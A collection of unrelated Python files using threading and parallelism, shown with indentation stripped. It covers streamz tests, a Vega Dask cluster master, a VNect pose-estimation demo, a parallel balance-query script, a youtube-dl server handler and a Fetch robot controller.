yield gen.sleep(0.1)
L.append(x)
source = Stream(asynchronous=False)
source.map(inc).sink(slow_write)
start = time()
source.emit(1)
stop = time()
assert stop - start > 0.1
assert L == [2]
def test_execution_order():
L = []
for i in range(5):
s = Stream()
b = s.pluck(1)
a = s.pluck(0)
li = a.combine_latest(b, emit_on=a).sink_to_list()
z = [(1, 'red'), (2, 'blue'), (3, 'green')]
for zz in z:
s.emit(zz)
L.append((li, ))
for ll in L:
assert ll == L[0]
L2 = []
for i in range(5):
s = Stream()
a = s.pluck(0)
b = s.pluck(1)
li = a.combine_latest(b, emit_on=a).sink_to_list()
z = [(1, 'red'), (2, 'blue'), (3, 'green')]
for zz in z:
s.emit(zz)
L2.append((li,))
for ll, ll2 in zip(L, L2):
assert ll2 == L2[0]
assert ll != ll2
@gen_test()
def test_map_errors_log():
a = Stream(asynchronous=True)
b = a.delay(0.001).map(lambda x: 1 / x) # noqa: F841
with captured_logger('streamz') as logger:
a._emit(0)
yield gen.sleep(0.1)
out = logger.getvalue()
assert 'ZeroDivisionError' in out
def test_map_errors_raises():
a = Stream()
b = a.map(lambda x: 1 / x) # noqa: F841
with pytest.raises(ZeroDivisionError):
a.emit(0)
@gen_test()
def test_accumulate_errors_log():
a = Stream(asynchronous=True)
b = a.delay(0.001).accumulate(lambda x, y: x / y, with_state=True) # noqa: F841
with captured_logger('streamz') as logger:
a._emit(1)
a._emit(0)
yield gen.sleep(0.1)
out = logger.getvalue()
assert 'ZeroDivisionError' in out
def test_accumulate_errors_raises():
a = Stream()
b = a.accumulate(lambda x, y: x / y, with_state=True) # noqa: F841
with pytest.raises(ZeroDivisionError):
a.emit(1)
a.emit(0)
@gen_test()
def test_sync_in_event_loop():
a = Stream()
assert not a.asynchronous
L = a.timed_window(0.01).sink_to_list()
sleep(0.05)
assert L
assert a.loop
assert a.loop is not IOLoop.current()
def test_share_common_ioloop(clean): # noqa: F811
a = Stream()
b = Stream()
aa = a.timed_window(0.01)
bb = b.timed_window(0.01)
assert aa.loop is bb.loop
@pytest.mark.parametrize('data', [
[[], [0, 1, 2, 3, 4, 5]],
[[None, None, None], [0, 1, 2, 3, 4, 5]],
[[1, None, None], [1, 2, 3, 4, 5]],
[[None, 4, None], [0, 1, 2, 3]],
[[None, 4, 2], [0, 2]],
[[3, 1, None], []]
])
def test_slice(data):
pars, expected = data
a = Stream()
b = a.slice(*pars)
out = b.sink_to_list()
for i in range(6):
a.emit(i)
assert out == expected
def test_slice_err():
a = Stream()
with pytest.raises(ValueError):
a.slice(end=-1)
def test_start():
flag = []
class MySource(Stream):
def start(self):
flag.append(True)
s = MySource().map(inc)
s.start()
assert flag == [True]
def test_connect_zip():
a = Stream()
b = Stream()
c = Stream()
x = a.zip(b)
L = x.sink_to_list()
c.connect(x)
a.emit(1)
b.emit(1)
assert not L
c.emit(1)
assert L == [(1, 1, 1)]
def test_disconnect_zip():
a = Stream()
b = Stream()
c = Stream()
x = a.zip(b, c)
L = x.sink_to_list()
b.disconnect(x)
a.emit(1)
b.emit(1)
assert not L
c.emit(1)
assert L == [(1, 1)]
def test_connect_combine_latest():
a = Stream()
b = Stream()
c = Stream()
x = a.combine_latest(b, emit_on=a)
L = x.sink_to_list()
c.connect(x)
b.emit(1)
c.emit(1)
a.emit(1)
assert L == [(1, 1, 1)]
def test_connect_discombine_latest():
a = Stream()
b = Stream()
c = Stream()
x = a.combine_latest(b, c, emit_on=a)
L = x.sink_to_list()
c.disconnect(x)
b.emit(1)
c.emit(1)
a.emit(1)
assert L == [(1, 1)]
if sys.version_info >= (3, 5):
from streamz.tests.py3_test_core import * # noqa
def test_buffer_after_partition():
Stream().partition(1).buffer(1)
def test_buffer_after_timed_window():
Stream().timed_window(1).buffer(1)
def test_buffer_after_sliding_window():
Stream().sliding_window(1).buffer(1)
|
master.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""The main part of the cluster framework.
The Master Class to create, maintain distribute framework and distribute
calculate tasks.
"""
import os
import sys
import logging
import time
import threading
import uuid
import glob
from threading import Lock
from queue import Queue
from vega.trainer import utils
from .distribution import ClusterDaskDistributor
from vega.common import TaskOps, FileOps
from vega.common.general import General
from .worker_env import WorkerEnv
from .dask_env import DaskEnv
from vega.trainer.deserialize import pickle_worker
from vega.trainer.run_remote_worker import run_remote_worker
from .master_base import MasterBase
from vega.report import ReportClient
class Master(MasterBase):
"""The Master Class is to create, maintain distribute framework and distribute calculate tasks.
:param argparse.ArgumentParser args: `args` is a argparse that should
contain `init_method`, `rank` and `world_size`.
:param Config cfg: `cfg`.
"""
def __init__(self, update_func=None):
"""Init master attrs, setup and start dask distributed cluster and local multiprocess pool."""
self._checkout_cluster_existed()
self.cfg = General()
self.task_count = 0
self.eval_count = General.worker.eval_count
self.__master_path__ = FileOps.join_path(TaskOps().temp_path, "master")
FileOps.make_dir(self.__master_path__)
self.dask_env = DaskEnv(General.env,
self.__master_path__,
General.devices_per_trainer,
TaskOps().temp_path)
status = self.dask_env.start()
if not status or not self.dask_env.is_master:
sys.exit(0)
self._start_cluster()
self.t_queue = Queue()
self.update_func = update_func
self._thread_runing = True
self._lock = Lock()
self._thread = self._run_monitor_thread()
return
def restart(self, update_func=None):
"""Renew master."""
self.client = self.get_client()
self.update_func = update_func
if not self._thread_runing:
self._thread = self._run_monitor_thread()
def get_client(self):
"""Get Master client."""
if not hasattr(self, "client"):
self.client = self.md.get_client()
return self.client
def _checkout_cluster_existed(self):
# TODO
return False
def _start_cluster(self):
"""Set and start dask distributed cluster."""
self.md = ClusterDaskDistributor(self.dask_env.master_address)
self.client = self.md.get_client()
local_host = None
if "BATCH_CURRENT_HOST" in os.environ:
local_host = os.environ["BATCH_CURRENT_HOST"]
elif "BATCH_CUSTOM0_HOSTS" in os.environ:
local_host = os.environ["BATCH_CUSTOM0_HOSTS"]
if "CUDA_VISIBLE_DEVICES" in os.environ:
os.environ["ORIGIN_CUDA_VISIBLE_DEVICES"] = os.environ["CUDA_VISIBLE_DEVICES"]
self._remove_worker_number_file()
plugin = WorkerEnv(self.dask_env.slave_proc_num,
self.dask_env.slave_device_num_per_proc,
local_host,
os.getpid(),
TaskOps().temp_path)
self.client.register_worker_plugin(plugin)
if "ORIGIN_CUDA_VISIBLE_DEVICES" in os.environ:
os.environ["CUDA_VISIBLE_DEVICES"] = os.environ["ORIGIN_CUDA_VISIBLE_DEVICES"]
if "CUDA_VISIBLE_DEVICES" in os.environ and "ORIGIN_CUDA_VISIBLE_DEVICES" not in os.environ:
del os.environ["CUDA_VISIBLE_DEVICES"]
return
def _remove_worker_number_file(self):
_worker_number_file = os.path.join(TaskOps().temp_path, ".*worker_number")
files = glob.glob(_worker_number_file)
for _file in files:
os.remove(_file)
@property
def has_free_worker(self):
"""Property: check is has free dask worker.
:return: return Ture if has free dask worker, otherwise return False.
:rtype: bool
"""
if self.md.process_queue_full():
return False
else:
return True
def run(self, worker, evaluator=None):
"""Run a distributed_worker on different cluster.
:param worker: A serializable object (callable and has `__call__`
function) which need to be distributed calculaton.
:type worker: object that the class was inherited from DistributedWorker.
"""
if worker is None:
return
workers = [worker]
if evaluator and evaluator.worker_type == utils.WorkerTypes.EVALUATOR:
for sub_worker in evaluator.sub_worker_list:
if sub_worker.worker_type == utils.WorkerTypes.DeviceEvaluator:
workers.insert(0, sub_worker)
else:
workers.append(sub_worker)
finished = False
while not finished:
if not self.md.process_queue_full():
p_id = self.task_count
if worker.step_name is not None and worker.worker_id is not None:
p_id = "{0}::{1}::{2}".format(
worker.worker_type.name, worker.step_name, worker.worker_id)
pickle_id = uuid.uuid1().hex[:8]
pickle_worker(workers, pickle_id)
self.md.distribute(
client=self.client,
pid=p_id,
func=run_remote_worker,
kwargs={
"worker_id": worker.worker_id,
"worker_path": worker.get_local_worker_path(),
"id": pickle_id,
"num_workers": len(workers)})
self.task_count = self.task_count + 1
return p_id
else:
time.sleep(0.1)
return
@staticmethod
def _monitor_thread(master):
while master and master._thread_runing:
worker_info_list = master._pop_all_finished_worker()
if worker_info_list:
for worker_info in worker_info_list:
worker_id = worker_info["worker_id"]
master._update(worker_info["step_name"], worker_id)
time.sleep(0.1)
def _update(self, step_name, worker_id):
# Waiting report thread update all record
ReportClient().set_finished(step_name, worker_id)
if not self.update_func:
return
if self.update_func.__code__.co_varnames.index("step_name") == 1:
self.update_func(step_name, worker_id)
else:
self.update_func({"step_name": step_name, "worker_id": worker_id})
def _run_monitor_thread(self):
try:
logging.debug("Start master monitor thread.")
self._thread_runing = True
monitor_thread = threading.Thread(target=Master._monitor_thread, args=(self,))
monitor_thread.daemon = True
monitor_thread.start()
return monitor_thread
except Exception as e:
logging.error("Failed to run monitor thread.")
raise e
def join(self):
"""Wait all workers to finished."""
self.md.join()
return
def update_status(self):
"""Update Master queue status."""
t_pid, _ = self.md.result_queue_get()
if t_pid is not None:
pid_splited = t_pid.split("::")
if len(pid_splited) >= 3:
(_type, step_name, worker_id) = pid_splited
pid = "{0}::{1}".format(step_name, worker_id)
self.t_queue.put(pid)
return
def get_result_from_worker(self):
"""Get a result from a finished worker in dask cluster.
:return: the pid and result of a finished worker if there are finished
worker in queue, otherwise return(None, None).
:rtype: (pid, result) or (None, None)
"""
if not self.md.result_queue_empty():
pid, result = self.md.result_queue_get()
return pid, result
else:
return None, None
def _pop_finished_worker(self):
"""Pop a finished dask worker's info, if there are finished dask worker in queue.
:return: the finished worker info, include step_name and worker_id.
eg. {"step_name":"round1", "worker_id":1}
:rtype: dict or None
"""
self.update_status()
pid = None
if not self.t_queue.empty():
pid = self.t_queue.get()
if pid is None:
return None
else:
pid_splited = pid.split("::")
if len(pid_splited) < 2:
return None
else:
return {"step_name": pid_splited[0],
"worker_id": pid_splited[1]}
def _pop_all_finished_worker(self):
"""Pop all finished train worker's info.
:return: a finished worker info list.
:rtype: list of dict
"""
worker_info_list = []
finished_train_worker_info = self._pop_finished_worker()
while finished_train_worker_info is not None:
worker_info_list.append(finished_train_worker_info)
finished_train_worker_info = self._pop_finished_worker()
return worker_info_list
def close(self):
"""Close cluster client."""
self._thread_runing = False
if self._thread:
self._thread.join()
# Waiting thread exit.
if hasattr(self, "client") and not self.client:
self.client.close()
del self.client
# Waiting cluster closed
time.sleep(1)
def shutdown(self):
"""Close cluster client."""
self.close()
client = self.get_client()
client.shutdown()
client.close()
del client
# Waiting cluster closed
time.sleep(1)
|
demo_multithread.py
|
import caffe
import argparse
import os
import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
import threading
import Queue
from mpl_toolkits.mplot3d import Axes3D
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--device', default='gpu')
parser.add_argument('--model_dir', default='/media/tim_ho/HDD1/Projects/VNect-tensorflow/models')
parser.add_argument('--input_size', default=368)
parser.add_argument('--num_of_joints', default=21)
parser.add_argument('--pool_scale', default=8)
parser.add_argument('--plot_2d', default=False)
parser.add_argument('--plot_3d', default=True)
args = parser.parse_args()
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# Limb parents of each joint
limb_parents = [1, 15, 1, 2, 3, 1, 5, 6, 14, 8, 9, 14, 11, 12, 14, 14, 1, 4, 7, 10, 13]
# Input scales
scales = [1.0, 0.7]
# Global vars for threads
# joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
# joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
# cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
# hm_size = args.input_size // args.pool_scale
# hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
# Create queue between threads
cam_model_q = Queue.Queue(1)
model_post_q = Queue.Queue(1)
post_render_q = Queue.Queue(1)
def camera_reader():
cam = cv2.VideoCapture(0)
while True:
t1 = time.time()
cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
if not cam_model_q.full():
cam_model_q.put(cam_img)
# print('cam put')
print('Cam FPS', 1/(time.time()-t1))
def forward():
# global hm_avg, x_hm_avg, y_hm_avg, z_hm_avg
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
if args.device == 'cpu':
caffe.set_mode_cpu()
elif args.device == 'gpu':
caffe.set_mode_gpu()
caffe.set_device(1)
else:
raise ValueError('No such device')
model_prototxt_path = os.path.join(args.model_dir, 'vnect_net.prototxt')
model_weight_path = os.path.join(args.model_dir, 'vnect_model.caffemodel')
# Load model
model = caffe.Net(model_prototxt_path,
model_weight_path,
caffe.TEST)
# Show network structure and shape
print('##################################################')
print('################Network Structures################')
print('##################################################')
for layer_name in model.params.keys():
print(layer_name, model.params[layer_name][0].data.shape)
print('')
print('##################################################')
print('##################################################')
print('##################################################')
print('\n\n\n\n')
print('##################################################')
print('################Input Output Blobs################')
print('##################################################')
for i in model.blobs.keys():
print(i, model.blobs[i].data.shape)
print('##################################################')
print('##################################################')
print('##################################################')
# cam = cv2.VideoCapture(0)
is_tracking = False
# for img_name in os.listdir('test_imgs'):
while True:
# if not is_tracking:
img_path = 'test_imgs/{}'.format('dance.jpg')
t1 = time.time()
input_batch = []
if not cam_model_q.empty():
cam_img = cam_model_q.get()
# print('forward get')
# cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
# cam_img = utils.read_square_image(img_path, '', args.input_size, 'IMAGE')
# cv2.imshow('', cam_img)
# cv2.waitKey(0)
orig_size_input = cam_img.astype(np.float32)
for scale in scales:
resized_img = utils.resize_pad_img(orig_size_input, scale, args.input_size)
input_batch.append(resized_img)
input_batch = np.asarray(input_batch, dtype=np.float32)
input_batch = np.transpose(input_batch, (0, 3, 1, 2))
input_batch /= 255.0
input_batch -= 0.4
model.blobs['data'].data[...] = input_batch
# Forward
model.forward()
# Get output data
x_hm = model.blobs['x_heatmap'].data
y_hm = model.blobs['y_heatmap'].data
z_hm = model.blobs['z_heatmap'].data
hm = model.blobs['heatmap'].data
# Trans coordinates
x_hm = x_hm.transpose([0, 2, 3, 1])
y_hm = y_hm.transpose([0, 2, 3, 1])
z_hm = z_hm.transpose([0, 2, 3, 1])
hm = hm.transpose([0, 2, 3, 1])
# Average scale outputs
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
for i in range(len(scales)):
rescale = 1.0 / scales[i]
scaled_hm = cv2.resize(hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_x_hm = cv2.resize(x_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_y_hm = cv2.resize(y_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_z_hm = cv2.resize(z_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
mid = [scaled_hm.shape[0] // 2, scaled_hm.shape[1] // 2]
hm_avg += scaled_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
x_hm_avg += scaled_x_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
y_hm_avg += scaled_y_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
z_hm_avg += scaled_z_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
hm_avg /= len(scales)
x_hm_avg /= len(scales)
y_hm_avg /= len(scales)
z_hm_avg /= len(scales)
t2 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t2))
if not model_post_q.full():
# model_post_q.put([hm_avg, x_hm_avg, y_hm_avg, z_hm_avg, cam_img])
model_post_q.put([joints_2d, joints_3d, cam_img])
# print('forward put')
print('Forward FPS', 1 / (time.time() - t1))
# Get 2d joints
# joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
# joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
# joints_3d)
# plt.show(block=False)
def post_process():
# global joints_2d, joints_3d
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
while True:
if not model_post_q.empty():
[hm_avg, x_hm_avg, y_hm_avg, z_hm_avg, cam_img] = model_post_q.get(False)
# print('post get')
t1 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
if args.plot_3d:
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t1))
if not post_render_q.full():
post_render_q.put([joints_2d, joints_3d, cam_img])
# print('post put')
def render_plt():
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
cam_img = np.zeros(shape=(args.input_size, args.input_size, 3), dtype=np.uint8)
if args.plot_3d and args.plot_2d:
plt.ion()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plt.show()
elif args.plot_3d:
plt.ion()
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
while True:
if model_post_q.qsize() != 0:
[joints_2d, joints_3d, cam_img] = model_post_q.get(False)
else:
print('render old')
t1 = time.time()
# Plot 2d location heatmap
if args.plot_2d:
joint_map = np.zeros(shape=(args.input_size, args.input_size, 3))
for joint_num in range(joints_2d.shape[0]):
cv2.circle(joint_map, center=(joints_2d[joint_num][1], joints_2d[joint_num][0]), radius=3,
color=(255, 0, 0), thickness=-1)
# Plot 2d limbs
limb_img = utils.draw_limbs_2d(cam_img, joints_2d, limb_parents)
# Plot 3d limbs
if args.plot_3d:
ax.clear()
ax.view_init(azim=0, elev=90)
ax.set_xlim(-700, 700)
ax.set_ylim(-800, 800)
ax.set_zlim(-700, 700)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
utils.draw_limbs_3d(joints_3d, limb_parents, ax)
# draw heatmap
# hm_img = utils.draw_predicted_heatmap(hm_avg*200, args.input_size)
# cv2.imshow('hm', hm_img.astype(np.uint8))
# cv2.waitKey(0)
if args.plot_2d and args.plot_3d:
concat_img = np.concatenate((limb_img, joint_map), axis=1)
ax2.imshow(concat_img[..., ::-1].astype(np.uint8))
plt.pause(1e-10)
elif args.plot_3d:
plt.pause(1e-10)
else:
concat_img = np.concatenate((limb_img, joint_map), axis=1)
cv2.imshow('2d', concat_img.astype(np.uint8))
cv2.waitKey(1)
# ax2.imshow(concat_img.astype(np.uint8))
print('Render FPS', 1 / (time.time() - t1))
if __name__ == '__main__':
t1 = threading.Thread(target=camera_reader, name='cam_thread')
t2 = threading.Thread(target=forward, name='model_thread')
# t3 = threading.Thread(target=post_process, name='post_process_thread')
t4 = threading.Thread(target=render_plt, name='render_thread')
t1.start()
t2.start()
# t3.start()
t4.start()
|
test_inquire_balances_parralelly.py
|
# passed
from wrapper.client import Client
from wrapper import db as DB
import os
import requests
import threading
import json
result=[]
def store_response(address):
content = requests.get('http://47.52.0.154:8888/accounts/' + address)
content=content.content
try:
content=json.loads(content)
balance=float(content['balances'][0]['balance'])
result.append((address,balance))
except Exception as e:
print(e)
store_response('GAA6EXQ7OZPJI4KWH3DNDNVEDAJ6QXF2DEDIKU7CGROWKHWDFQJAT5SQ')
path = os.getcwd()
DB_NAME = path + '\\keys.db'
my_sql_manager = DB.SQLManager(DB_NAME)
rows = my_sql_manager.execute('select * from keys order by ID asc limit 1024')
addresses = []
threads = []
for i in range(512):
address = rows[i][2]
thread = threading.Thread(target=store_response, args=(address,))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
a = 1
|
ydlhandler.py
|
import os
from queue import Queue
from threading import Thread
import subprocess
import io
import importlib
import json
from time import sleep
from datetime import datetime
import sys
from subprocess import Popen, PIPE, STDOUT
from ydl_server.logdb import JobsDB, Job, Actions, JobType
def reload_youtube_dl():
for module in list(sys.modules.keys()):
if 'youtube' in module:
try:
importlib.reload(sys.modules[module])
except ModuleNotFoundError:
print("ModuleNotFoundError:\n" + module)
def get_ydl_website(ydl_module_name):
import pip._internal.commands.show as pipshow
info = list(pipshow.search_packages_info([ydl_module_name]))
if len(info) < 1 or 'home-page' not in info[0]:
return ''
return info[0]['home-page']
def read_proc_stdout(proc, strio):
strio.write(proc.stdout.read1().decode())
class YdlHandler:
def __init__(self, app_config, jobshandler):
self.queue = Queue()
self.thread = None
self.done = False
self.ydl_module = None
self.ydl_module_name = None
self.app_config = app_config
self.jobshandler = jobshandler
self.app_config['ydl_last_update'] = datetime.now()
modules = ['youtube-dl', 'youtube-dlc']
if os.environ.get('YOUTUBE_DL') in modules:
self.ydl_module = importlib.import_module(
os.environ.get('YOUTUBE_DL').replace('-', '_'))
else:
for module in modules:
try:
self.ydl_module = importlib.import_module(
module.replace('-', '_'))
break
except ImportError:
pass
if self.ydl_module is None:
raise ImportError('No youtube_dl implementation found')
self.ydl_module_name = self.ydl_module.__name__.replace('_', '-')
self.ydl_website = get_ydl_website(self.ydl_module_name)
print('Using {} module'.format(self.ydl_module_name))
def start(self):
self.thread = Thread(target=self.worker)
self.thread.start()
def put(self, obj):
self.queue.put(obj)
def finish(self):
self.done = True
def worker(self):
while not self.done:
job = self.queue.get()
job.status = Job.RUNNING
self.jobshandler.put((Actions.SET_STATUS, (job.id, job.status)))
if job.type == JobType.YDL_DOWNLOAD:
output = io.StringIO()
try:
self.download(job, {'format': job.format}, output)
except Exception as e:
job.status = Job.FAILED
job.log = "Error during download task:\n{}:\n\t{}"\
.format(type(e).__name__, str(e))
print("Error during download task:\n{}:\n\t{}"\
.format(type(e).__name__, str(e)))
elif job.type == JobType.YDL_UPDATE:
rc, log = self.update()
job.log = Job.clean_logs(log)
job.status = Job.COMPLETED if rc == 0 else Job.FAILED
self.jobshandler.put((Actions.UPDATE, job))
self.queue.task_done()
def update(self):
if os.environ.get('YDL_PYTHONPATH'):
command = [
"pip", "install", "--no-cache-dir",
"-t", os.environ.get('YDL_PYTHONPATH'),
"--upgrade", self.ydl_module_name
]
else:
command = [
"pip", "install", "--no-cache-dir",
"--upgrade", self.ydl_module_name
]
proc = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
if proc.wait() == 0:
self.app_config['ydl_last_update'] = datetime.now()
reload_youtube_dl()
return proc.returncode, str(out.decode('utf-8'))
def get_ydl_options(self, ydl_config, request_options):
ydl_config = ydl_config.copy()
req_format = request_options.get('format')
if req_format is None:
req_format = 'best'
if req_format.startswith('audio/'):
ydl_config.update({'extract-audio': None})
ydl_config.update({'audio-format': req_format.split('/')[-1]})
elif req_format.startswith('video/'):
# youtube-dl downloads BEST video and audio by default
if req_format != 'video/best':
ydl_config.update({'format': req_format.split('/')[-1]})
else:
ydl_config.update({'format': req_format})
return ydl_config
def download_log_update(self, job, proc, strio):
while job.status == Job.RUNNING:
read_proc_stdout(proc, strio)
job.log = Job.clean_logs(strio.getvalue())
self.jobshandler.put((Actions.SET_LOG, (job.id, job.log)))
sleep(3)
def fetch_metadata(self, url):
ydl_opts = self.app_config.get('ydl_options', {})
cmd = self.get_ydl_full_cmd(ydl_opts, url)
cmd.extend(['-J', '--flat-playlist'])
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
if proc.wait() != 0:
return -1, stderr.decode()
return 0, json.loads(stdout)
def get_ydl_full_cmd(self, opt_dict, url):
cmd = [self.ydl_module_name]
if opt_dict is not None:
for key, val in opt_dict.items():
if isinstance(val, bool) and not val:
continue
cmd.append('--{}'.format(key))
if val is not None and not isinstance(val, bool):
cmd.append(str(val))
cmd.append(url)
return cmd
def download(self, job, request_options, output):
ydl_opts = self.get_ydl_options(self.app_config.get('ydl_options', {}),
request_options)
cmd = self.get_ydl_full_cmd(ydl_opts, job.url)
rc, metadata = self.fetch_metadata(job.url)
if rc != 0:
job.log = Job.clean_logs(metadata)
job.status = Job.FAILED
raise Exception(job.log)
self.jobshandler.put((Actions.SET_NAME,
(job.id, metadata.get('title', job.url))))
if metadata.get('_type') == 'playlist':
ydl_opts.update({
'output': self.app_config['ydl_server']
.get('output_playlist', ydl_opts.get('output'))
})
cmd = self.get_ydl_full_cmd(ydl_opts, job.url)
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT)
stdout_thread = Thread(target=self.download_log_update,
args=(job, proc, output))
stdout_thread.start()
if proc.wait() == 0:
read_proc_stdout(proc, output)
job.log = Job.clean_logs(output.getvalue())
job.status = Job.COMPLETED
else:
read_proc_stdout(proc, output)
job.log = Job.clean_logs(output.getvalue())
job.status = Job.FAILED
print("Error during download task:\n" + output.getvalue())
stdout_thread.join()
def resume_pending(self):
db = JobsDB(readonly=False)
jobs = db.get_all()
not_endeds = [job for job in jobs if job['status'] == "Pending"
or job['status'] == 'Running']
for pending in not_endeds:
if int(pending["type"]) == JobType.YDL_UPDATE:
self.jobshandler.put((Actions.SET_STATUS,
(pending["id"], Job.FAILED)))
else:
job = Job(pending["name"],
Job.PENDING, "Queue stopped",
int(pending["type"]),
pending["format"], pending["url"])
job.id = pending["id"]
self.jobshandler.put((Actions.RESUME, job))
def join(self):
if self.thread is not None:
return self.thread.join()
def get_ydl_version(self):
return self.ydl_module.version.__version__
def get_ydl_extractors(self):
return [ie.IE_NAME for ie in self.ydl_module.extractor
.list_extractors(
self.app_config['ydl_options'].get('age-limit')
) if ie._WORKING]
|
navigate_phy_parallel_controller.py
|
#! /usr/bin/python
# Copyright (c) 2015, Rethink Robotics, Inc.
# Using this CvBridge Tutorial for converting
# ROS images to OpenCV2 images
# http://wiki.ros.org/cv_bridge/Tutorials/ConvertingBetweenROSImagesAndOpenCVImagesPython
# Using this OpenCV2 tutorial for saving Images:
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_gui/py_image_display/py_image_display.html
# rospy for the subscriber
import rospy
# ROS Image message
from sensor_msgs.msg import Image, JointState
# ROS Image message -> OpenCV2 image converter
from cv_bridge import CvBridge, CvBridgeError
# from tf_listener import get_transformation, transform_point
# OpenCV2 for saving an image
import cv2
import numpy as np
import math
import actionlib
import fetch_api
import control_msgs.msg
from sensor_msgs.msg import PointCloud2
import trajectory_msgs.msg
import struct
from geometry_msgs.msg import Point, PointStamped, PoseStamped
from robotics_labs.msg import BoxTarget
import tf2_ros
import tf2_geometry_msgs
from threading import Thread
from multiprocessing import Process, Value, Array
MIN_PAN = -math.pi / 2
MAX_PAN = math.pi / 2
MIN_TILT = -math.pi / 2
MAX_TILT = math.pi / 4
PAN_JOINT = 'head_pan_joint'
TILT_JOINT = 'head_tilt_joint'
PAN_TILT_TIME = 2
# Instantiate CvBridge
bridge = CvBridge()
initBB = None
tracker = cv2.TrackerCSRT_create()
linear_speed = 0
angular_speed = Value('d', 0.0)
porpotion_prev = 0 # assuming fetch is facing the object
e_prev = 0
intergral_tilt = 0
traj_client = None
current_dist = 0
cx = None
cy = None
image_sub = None
dist_sub = None
tilt = Value('d', 0.0)
tf_buffer = None
stop = False
flush_count = 0
current_head_angle = 0
def controller():
print "process running"
global angular_speed
global linear_speed
global tilt
global traj_client
global stop
fetch_base = fetch_api.Base()
fetch_head = fetch_api.Head()
r = rospy.Rate(25)
while not rospy.is_shutdown() and not stop:
# print "publishing"
fetch_base.move(linear_speed, angular_speed.value)
point = trajectory_msgs.msg.JointTrajectoryPoint()
point.positions = [0, tilt.value]
point.time_from_start = rospy.Duration(2.5)
goal = control_msgs.msg.FollowJointTrajectoryGoal()
goal.trajectory.joint_names = [PAN_JOINT, TILT_JOINT]
goal.trajectory.points.append(point)
traj_client.send_goal(goal)
r.sleep()
# fetch_base.go_forward(0.35)
